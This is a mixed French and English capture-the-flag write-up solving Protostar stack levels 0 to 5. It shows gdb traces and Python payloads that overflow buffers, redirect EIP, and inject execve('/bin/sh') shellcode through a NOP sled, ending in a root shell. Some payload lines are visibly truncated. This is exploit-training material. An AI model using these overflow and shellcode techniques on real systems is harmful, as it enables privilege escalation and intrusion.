Exploit-Exercises: Protostar 
Protostar introduces the following in a friendly way:

    Network programming
    Byte order
    Handling sockets
    Stack overflows
    Format strings
    Heap overflows

The above is introduced in a simple way, starting with simple memory corruption and modification, function redirection, and finally executing custom shellcode.

In order to make this as easy as possible to introduce Address Space Layout Randomization and Non-Executable memory has been disabled. If you are interested in covering ASLR and NX memory.



# Protostar - Stack Levels

In [ ]:
Protostar/Stack0
This level introduces the concept that memory can be accessed outside of its allocated region,
how the stack variables are laid out, and that modifying outside of the allocated memory can modify program execution.


stack0.c

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>

int main(int argc, char **argv)
{
  volatile int modified;
  char buffer[64];

  modified = 0;
  gets(buffer);

  if(modified != 0) {
      printf("you have changed the 'modified' variable\n");
  } else {
      printf("Try again?\n");
  }
}

SOLUTION :

-----------------------------------------------------------------------------------------------


(gdb) disassemble main
Dump of assembler code for function main:
0x080483f4 <main+0>:	push   ebp
0x080483f5 <main+1>:	mov    ebp,esp
0x080483f7 <main+3>:	and    esp,0xfffffff0
0x080483fa <main+6>:	sub    esp,0x60
0x080483fd <main+9>:	mov    DWORD PTR [esp+0x5c],0x0
0x08048405 <main+17>:	lea    eax,[esp+0x1c]
0x08048409 <main+21>:	mov    DWORD PTR [esp],eax
0x0804840c <main+24>:	call   0x804830c <gets@plt>
0x08048411 <main+29>:	mov    eax,DWORD PTR [esp+0x5c]
0x08048415 <main+33>:	test   eax,eax
0x08048417 <main+35>:	je     0x8048427 <main+51>
0x08048419 <main+37>:	mov    DWORD PTR [esp],0x8048500
0x08048420 <main+44>:	call   0x804832c <puts@plt>
0x08048425 <main+49>:	jmp    0x8048433 <main+63>
0x08048427 <main+51>:	mov    DWORD PTR [esp],0x8048529
0x0804842e <main+58>:	call   0x804832c <puts@plt>
0x08048433 <main+63>:	leave  
0x08048434 <main+64>:	ret    
End of assembler dump.
--------------------------------------------------------------
break *0x08048415
--------------------------------------------------------------
--> 0x080483fd <main+9>:	mov    DWORD PTR [esp+0x5c],0x0
Donc la variable 'modified' est localisé a l'offset "esp+0x5c"
Donc l'address est : 0xbffff79c

--> 0x08048415 <main+33>:	test   eax,eax
Le registre EAX(extended ax) contient la valeur de la variable 'modified'
--------------------------------------------------------------
On fait un simple test avec des caractères dont leur code ascii est bien reconnues
Donc on ecrit comme exemple d'input 'A' * 64 : 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
--------------------------------------------------------------
(gdb) x/24wx $esp
0xbffff740:	0xbffff75c	0x00000001	0xb7fff8f8	0xb7f0186e
0xbffff750:	0xb7fd7ff4	0xb7ec6165	0xbffff768	0x41414141
0xbffff760:	0x41414141	0x41414141	0x41414141	0x41414141
0xbffff770:	0x41414141	0x41414141	0x41414141	0x41414141
0xbffff780:	0x41414141	0x41414141	0x41414141	0x41414141
0xbffff790:	0x41414141	0x41414141	0x41414141	0x00000000 <--
(gdb) x $esp+0x5c
0xbffff79c:	0x00000000
Notre variable modified = 0

On remarque que notre buffer 
commance dès l adresse 0xbffff750+8 et termine a 0xbffff790+c
Donc on besoin d ecrire ( 4 + 3*16 + 4*3 + n importe quelle valeur != 0 pour ecrire dans la variable 'modified') 
--------------------------------------------------------------
Enfin : 
user@protostar:/opt/protostar/bin$ python -c 'print("A"*(4 + 16*3 + 12) + "BB")' | ./stack0 
you have changed the 'modified' variable

--------------------------------------------------------------
On a bien ecrire 'BB' dans la varible modified !


In [ ]:
Protostar/Stack1 
 This level looks at the concept of modifying variables to specific values in the program, 
and how the variables are laid out in memory.
--------------------------------------------------------------
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
  volatile int modified;
  char buffer[64];

  if(argc == 1) {
      errx(1, "please specify an argument\n");
  }

  modified = 0;
  strcpy(buffer, argv[1]);

  if(modified == 0x61626364) {
      printf("you have correctly got the variable to the right value\n");
  } else {
      printf("Try again, you got 0x%08x\n", modified);
  }
}
--------------------------------------------------------------
Is the same as the Stack0 
we just replace BB with 0x61626364 BUT writed in LITTTLE ENDIAN !!!!! 
--------------------------------------------------------------
./stack1 `python -c 'print("A"*(4 + 16*3 + 12) + "\x64\x63\x62\x61")'`
I used the 'BACKTICKS'  `` to redirect the output of python to the argv of stack1

In [ ]:
Protostar/Stack 2

Stack2 looks at environment variables, and how they can be set.

--------------------------------------------------------------
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
  volatile int modified;
  char buffer[64];
  char *variable;

  variable = getenv("GREENIE");

  if(variable == NULL) {
      errx(1, "please set the GREENIE environment variable\n");
  }

  modified = 0;

  strcpy(buffer, variable);

  if(modified == 0x0d0a0d0a) {
      printf("you have correctly modified the variable\n");
  } else {
      printf("Try again, you got 0x%08x\n", modified);
  }

}
--------------------------------------------------------------
Just the same as stack1 & stack0 , but here we use envirement variables to parse its content to buffer !

user@protostar:/opt/protostar/bin$ GREENIE=`python -c 'print("A"*(4 + 16*3 + 12) + "\x0a\x0d\x0a\x0d")'`
    
user@protostar:/opt/protostar/bin$ echo $GREENIE
 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

user@protostar:/opt/protostar/bin$ ./stack2
you have correctly modified the variable





In [ ]:
Protostar/Stack 3
 Stack3 looks at environment variables, and how they can be set, 
and overwriting function pointers stored on the stack (as a prelude to overwriting the saved EIP)

Hints:
both gdb and objdump is your friend you determining where the win() function lies in memory.
--------------------------------------------------------------
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

void win()
{
  printf("code flow successfully changed\n");
}

int main(int argc, char **argv)
{
  volatile int (*fp)();
  char buffer[64];

  fp = 0;

  gets(buffer);

  if(fp) {
      printf("calling function pointer, jumping to 0x%08x\n", fp);
      fp();
  }
}

--------------------------------------------------------------
la stragtégie est claire, nous besoins d ecrire l addresse du fonction win() dans le 'fucntion pointer' fp()

Donc , il faut extraire l adresse du fonction win(), avec une simple ligne de commande 

user@protostar:/opt/protostar/bin$ objdump -t stack3 | grep win 
08048424 g     F .text	00000014              win

--------------------------------------------------------------


0x08048441 <main+9>:	mov    DWORD PTR [esp+0x5c],0x0
le pointeur fp() se trouve au meme offset que les autres challenges !!!!!

--------------------------------------------------------------
So final solution : 
user@protostar:/opt/protostar/bin$ python -c 'import struct; win_address = struct.pack("I", 0x08048424);print("A"*64+win_address)' |./stack3
calling function pointer, jumping to 0x08048424
code flow successfully changed


In [ ]:
Protostar/Stack 4

Stack4 takes a look at overwriting saved EIP and standard buffer overflows.
Hints:
    
A variety of introductory papers into buffer overflows may help.
gdb lets you do "run < input"
EIP is not directly after the end of buffer, compiler padding can also increase the size. 

--------------------------------------------------------------

stack4.c

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

void win()
{
  printf("code flow successfully changed\n");
}

int main(int argc, char **argv)
{
  char buffer[64];

  gets(buffer);
}

--------------------------------------------------------------
Dans ce challenges , nous besoins de prend controle de EIP (instruction pointer) pour modifier le flux d execution du 
programme ... 
--------------------------------------------------------------
First i want to check after how much bytes i can overflow the return address aka the EIP !!!
so little script 
'''st = ""
for i in range(26):
    st += chr(i+65)*4

print(st)
'''
to generate :
AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ
and we test this is gdb and see the return address !!!!!!!!!!!!!!! 
--------------------------------------------------------------
Starting program: /opt/protostar/bin/stack4 
AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ

Breakpoint 1, main (argc=1431655765, argv=0x56565656) at stack4/stack4.c:16
16	in stack4/stack4.c
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x54545454 in ?? ()

54 is the hex ascii code for 'T'

(gdb) info registers 
eax            0xbffff710	-1073744112
ecx            0xbffff710	-1073744112
edx            0xb7fd9334	-1208118476
ebx            0xb7fd7ff4	-1208123404
esp            0xbffff760	0xbffff760
ebp            0x53535353	0x53535353  <--
esi            0x0	0
edi            0x0	0
eip            0x54545454	0x54545454  <--
eflags         0x200246	[ PF ZF IF ID ]
cs             0x73	115
ss             0x7b	123
ds             0x7b	123
es             0x7b	123
fs             0x0	0
gs             0x33	51

--------------------------------------------------------------

maintenant cherchons l address du win()

user@protostar:/opt/protostar/bin$ objdump -t stack4 | grep win
080483f4 g     F .text	00000014              win

so now we just need to replace input from the 'TTTT' with the address of win()
and we should not forget that the BASE POINTER EBP is also modified so 'SSSS' will now be the value of EBP
--------------------------------------------------------------

import struct as s

blabla = "AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRR"

ebp = "1111" # for example 

win_function_address_little_endian = s.pack("I", 0x080483f4)

print(blabla + ebp + win_function_address_little_endian)

--------------------------------------------------------------
user@protostar:/opt/protostar/bin$ python /tmp/a.py | ./stack4
code flow successfully changed
Segmentation fault


Still get seg fault but we redirected code flow execution , !!!!!!!!!!!!!!!!!!!!!!!!!!!




In [ ]:
# Protostar/Stack 5

 Stack5 is a standard buffer overflow, this time introducing shellcode.

This level is at /opt/protostar/bin/stack5

Hints:
At this point in time, it might be easier to use someone elses shellcode
If debugging the shellcode, use \xcc (int3) to stop the program executing and return to the debugger
remove the int3s once your shellcode is done

--------------------------------------------------------------
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
  char buffer[64];

  gets(buffer);
}

--------------------------------------------------------------
Ces deux lignes de code sont dangereuse !
Ici on doit executer /bin/sh or /bin/dash 
pour avoir root shell

things are getting little furious !!!!!
--------------------------------------------------------------

First we throw a long string in gdb to get offset that allow us to control EIP 

(gdb) disas main
Dump of assembler code for function main:
0x080483c4 <main+0>:	push   %ebp
0x080483c5 <main+1>:	mov    %esp,%ebp
0x080483c7 <main+3>:	and    $0xfffffff0,%esp
0x080483ca <main+6>:	sub    $0x50,%esp
0x080483cd <main+9>:	lea    0x10(%esp),%eax
0x080483d1 <main+13>:	mov    %eax,(%esp)
0x080483d4 <main+16>:	call   0x80482e8 <gets@plt>
0x080483d9 <main+21>:	leave  
0x080483da <main+22>:	ret    
End of assembler dump.
(gdb) break *0x080483da
Breakpoint 1 at 0x80483da: file stack5/stack5.c, line 11.
    
Also we define a hook to execute in every breakpoint hit ! 

(gdb) define hook-stop
Type commands for definition of "hook-stop".
End with a line saying just "end".
>x/1i $eip
>x/8wx $esp
>end


and then we run it with Alphabet input : 
(gdb) r < /tmp/all
Starting program: /opt/protostar/bin/stack5 < /tmp/all
0x80483da <main+22>:	ret    
0xbffff7ac:	0x54545454	0x55555555	0x56565656	0x57575757        "TTTT UUUU VVVV WWWW"
0xbffff7bc:	0x58585858	0x59595959	0x5a5a5a5a	0xb7ffef00        "XXXX YYYY ZZZZ trash"

Breakpoint 1, 0x080483da in main (argc=Cannot access memory at address 0x5353535b
) at stack5/stack5.c:11
11	stack5/stack5.c: No such file or directory.
	in stack5/stack5.c
    
(gdb) info registers 
eax            0xbffff760	-1073744032
ecx            0xbffff760	-1073744032
edx            0xb7fd9334	-1208118476
ebx            0xb7fd7ff4	-1208123404
esp            0xbffff7b0	0xbffff7b0
ebp            0x53535353	0x53535353
esi            0x0	0
edi            0x0	0
eip            0x54545454	0x54545454 <----
eflags         0x200246	[ PF ZF IF ID ]
cs             0x73	115
ss             0x7b	123
ds             0x7b	123
es             0x7b	123
fs             0x0	0
gs             0x33	51

(gdb) si
Cannot access memory at address 0x53535357  <---

--------------------------------------------------------------

in this exercise we don t have any funtion to change EIP to return to ! 
so , what should we do ? where should we redirect our code execution ?
HHHHHHHHHHHMMM ! 
i guess STACK will be perfect ! 

--------------------------------------------------------------
let s contruct our exploit ! 
import struct as s

alp = "AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSS"
eip = s.pack("I", 0xbffff7c0)
payload = "\xCC" * 4
print(alp+eip+payload)

--------------------------------------------------------------
''' 
Intel Instruction Reference : we search for \xCC INT3 as the hint said ! 
https://software.intel.com/sites/default/files/managed/39/c5/325462-sdm-vol-1-2abcd-3abcd.pdf
---------------------------------------------------------------
Indicates that a breakpoint instruction (INT3, opcode CC)
 was executed, causing a breakpoint trap to be gener-
ated. Typically, a debugger sets a breakpoint by replacing th
e first opcode byte of an instruction with the opcode for 
the INT3 instruction. (The INT3 instruction is one byte lo
ng, which makes it easy to replace an opcode in a code 
segment in RAM with the breakpoint opcode.) The operat
ing system or a debugging tool can use a data segment 
mapped to the same physical address space as the code segm
ent to place an INT3 instruction in places where it is 
desired to call the debugger.
---------------------------------------------------------------
#
SO we understand that GDB for example handle breakpoints by replacing it's memory with INT3 ......
'''
So let s see the py code in gdb !!! 
--------------------------------------------------------------

Starting program: /opt/protostar/bin/stack5 < /tmp/epp
0x80483da <main+22>:	ret    
0xbffff7ac:	0xbffff7b0	0xcccccccc	0xbffff800	0xbffff85c
0xbffff7bc:	0xb7fe1848	0xbffff810	0xffffffff	0xb7ffeff4

Breakpoint 1, 0x080483da in main (argc=Cannot access memory at address 0x5353535b
) at stack5/stack5.c:11
11	in stack5/stack5.c
(gdb) c
Continuing.

Program received signal SIGTRAP, Trace/breakpoint trap.
0xbffff7b1:	int3   
0xbffff7b0:	0xcccccccc	0xbffff800	0xbffff85c	0xb7fe1848
0xbffff7c0:	0xbffff810	0xffffffff	0xb7ffeff4	0x08048232
0xbffff7b1 in ?? ()
--------------------------------------------------------------
Now the ret is just int3 instruction ! which is illegal instruction to CPU ! 
now let s add some NOP (No operation instucion) - which has opcode 0x90 - in the code and see the stack and how the program respond !
we do this to prepare the place for our shellcode to be injected in the stack !!!

--------------------------------------------------------------
import struct as s

alp = "AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRR$
eip = s.pack("I", 0xbffff7c0+30)

payload = "\x90" *100 + "\xCC" * 4

print(alp+eip+payload)

--------------------------------------------------------------
now in GDB !!

Starting program: /opt/protostar/bin/stack5 < /tmp/epp
0x80483da <main+22>:	ret    
0xbffff7ac:	0xbffff7ce	0x90909090	0x90909090	0x90909090 <-- NOP 
0xbffff7bc:	0x90909090	0x90909090	0x90909090	0x90909090 <-- NOP

Breakpoint 1, 0x080483da in main (argc=Cannot access memory at address 0x5353535b
) at stack5/stack5.c:11
11	in stack5/stack5.c

Si on veut voir encore le STACK : Il ya beaucoup de NOP insc !
(gdb) x/40wx $esp
0xbffff7ac:	0xbffff7ce	0x90909090	0x90909090	0x90909090 <-- 0xbffff7ce 
0xbffff7bc:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffff7cc:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffff7dc:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffff7ec:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffff7fc:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffff80c:	0x90909090	0x90909090	0xcccccccc	0xb7eadb00 <-- here is our INT3 
0xbffff81c:	0xb7ffeff4	0x00000001	0x08048310	0x00000000
0xbffff82c:	0x08048331	0x080483c4	0x00000001	0xbffff854
0xbffff83c:	0x080483f0	0x080483e0	0xb7ff1040	0xbffff84c

--------------------------------------------------------------
now we get our shell code from SHELLSTORM ! 
''' http://shell-storm.org/shellcode/files/shellcode-811.php 

/*
Title:	Linux x86 execve("/bin/sh") - 28 bytes
Author:	Jean Pascal Pereira <pereira@secbiz.de>
Web:	http://0xffe4.org


Disassembly of section .text:

08048060 <_start>:
 8048060: 31 c0                 xor    %eax,%eax
 8048062: 50                    push   %eax
 8048063: 68 2f 2f 73 68        push   $0x68732f2f
 8048068: 68 2f 62 69 6e        push   $0x6e69622f
 804806d: 89 e3                 mov    %esp,%ebx
 804806f: 89 c1                 mov    %eax,%ecx
 8048071: 89 c2                 mov    %eax,%edx
 8048073: b0 0b                 mov    $0xb,%al
 8048075: cd 80                 int    $0x80
 8048077: 31 c0                 xor    %eax,%eax
 8048079: 40                    inc    %eax
 804807a: cd 80                 int    $0x80


*/

#include <stdio.h>

char shellcode[] = "\x31\xc0\x50\x68\x2f\x2f\x73" <-- "WE NEED THIS"
                   "\x68\x68\x2f\x62\x69\x6e\x89"
                   "\xe3\x89\xc1\x89\xc2\xb0\x0b"
                   "\xcd\x80\x31\xc0\x40\xcd\x80";

int main()
{
  fprintf(stdout,"Lenght: %d\n",strlen(shellcode));
  (*(void  (*)()) shellcode)();
}

'''
--------------------------------------------------------------
Notre script python sera 



import struct as s

alp = "AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRR$
eip = s.pack("I", 0xbffff7c0+30)

nops = "\x90" *100        
payload = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1$


print(alp+eip+nops+payload)

--------------------------------------------------------------

Et c est le resultat du GDB apres les commandes 'SI' (seek instruction) plusieurs fois !
0xbffff829:	int    $0x80
0xbffff7a4:	0x6e69622f	0x68732f2f	0x00000000	0x90909090
0xbffff7b4:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffff829 in ?? ()
(gdb) 
Executing new program: /bin/dash <---



Program exited normally.
Error while running hook_stop:
No registers.
(gdb) 

--------------------------------------------------------------
user@protostar:/tmp$ python exp.py | /opt/protostar/bin/stack5
user@protostar:/tmp$ 

    
a shell when he executes wants some input ! 
but we redirected stdout (standar output) of exp.py to stdin(standar input) of our shell , 
but when the python execution is over , the PIPE ('|') is closed and our shell remains withount input , so he will just exit 
    
    
and the idea is 'CAT' :
when we use cat without parameters it just reflect it s input to output , 
So it should look like that :
( python exp.py ; cat ) 

now we catch the py output and redirect it to 'cat' and we can enter new input 

--------------------------------------------------------------
AND THE RESULT : 
user@protostar:/tmp$ (python exp.py;cat )| /opt/protostar/bin/stack5
whoami
root
echo $SHELL

who 
user     tty1         Apr 29 14:04
user     pts/0        Apr 29 16:03 (192.168.1.103)
user     pts/1        Apr 29 16:20 (192.168.1.103)
id
uid=1001(user) gid=1001(user) euid=0(root) groups=0(root),1001(user)
